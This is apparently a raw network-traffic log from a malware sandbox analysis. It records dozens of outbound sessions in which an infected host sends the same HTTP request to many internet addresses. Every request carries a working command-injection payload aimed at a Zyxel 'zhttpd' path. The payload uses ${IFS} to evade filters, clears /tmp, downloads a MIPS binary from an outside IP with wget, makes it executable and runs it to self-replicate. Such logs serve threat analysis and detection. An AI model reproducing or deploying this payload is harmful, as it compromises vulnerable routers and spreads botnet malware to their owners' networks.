                                        Jan 14, 2024 16:18:34.215944052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1660192.168.2.1342458217.219.97.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215979099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1661192.168.2.1357390209.170.13.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.216037989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1662192.168.2.1349284140.220.223.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.216105938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1663192.168.2.1349098208.186.6.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.216165066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1664192.168.2.1350658183.97.192.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.216232061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1665192.168.2.134710824.10.74.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.216269016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1666192.168.2.1356760135.210.168.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.216332912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1667192.168.2.133961299.228.30.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.216372013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1668192.168.2.1346958155.26.86.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.216429949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1669192.168.2.1357920139.133.17.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.216484070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1670192.168.2.1357112158.150.165.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225198030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1671192.168.2.135189019.41.125.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225244045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1672192.168.2.135610887.236.112.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225375891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1673192.168.2.1360228199.26.3.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225409985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1674192.168.2.133997281.74.71.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225461960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1675192.168.2.1359642208.186.16.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225506067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1676192.168.2.135871490.52.231.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225532055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1677192.168.2.1334228109.38.223.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225591898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1678192.168.2.1349966149.101.216.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225625038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1679192.168.2.1348844210.240.54.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225691080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1680192.168.2.1337138173.194.58.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225706100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1681192.168.2.1341048181.20.80.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225748062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1682192.168.2.1344290143.10.231.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225797892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1683192.168.2.134991651.48.42.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225842953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1684192.168.2.1359202111.210.189.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225872040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1685192.168.2.135195042.228.254.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225899935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1686192.168.2.135863243.21.155.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225927114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1687192.168.2.1336672206.220.240.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.225974083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1688192.168.2.134324612.17.102.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226005077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1689192.168.2.135570458.47.20.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226068020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1690192.168.2.1358022111.187.113.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226115942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1691192.168.2.1358026193.233.129.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226138115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1692192.168.2.1351096185.51.187.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226171970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1693192.168.2.1353532103.193.66.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226203918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1694192.168.2.1336194211.169.19.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226275921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1695192.168.2.135338679.160.5.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226314068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1696192.168.2.135257685.151.17.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226346016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1697192.168.2.134607469.176.14.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226377964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1698192.168.2.1345528140.9.134.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226433039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1699192.168.2.1355266158.191.204.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226460934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1700192.168.2.135848475.94.63.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226514101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1701192.168.2.1360420210.19.79.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226557016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1702192.168.2.1344934200.28.107.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226603031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1703192.168.2.135872049.155.3.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226630926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1704192.168.2.1336684184.147.193.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226675034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1705192.168.2.134448638.7.121.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226706028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1706192.168.2.1360036189.206.8.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226758003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1707192.168.2.1354918112.140.50.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226810932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1708192.168.2.133917066.107.110.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226841927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1709192.168.2.1339868176.135.236.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226869106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1710192.168.2.1333062189.51.139.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226913929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1711192.168.2.1337258181.236.79.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.226967096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1712192.168.2.1359930183.5.203.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227015018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1713192.168.2.133811875.225.243.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227070093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1714192.168.2.1338920169.34.215.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227088928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1715192.168.2.133581660.240.253.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227133989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1716192.168.2.1336164175.126.175.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227154016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1717192.168.2.1353214141.196.25.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227232933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1718192.168.2.1355866222.242.57.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227272987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1719192.168.2.1333622185.177.227.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227293015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1720192.168.2.135539874.164.13.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227348089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1721192.168.2.135082248.147.148.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227389097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1722192.168.2.135763227.205.177.8443
                                        TimestampBytes transferredDirectionData
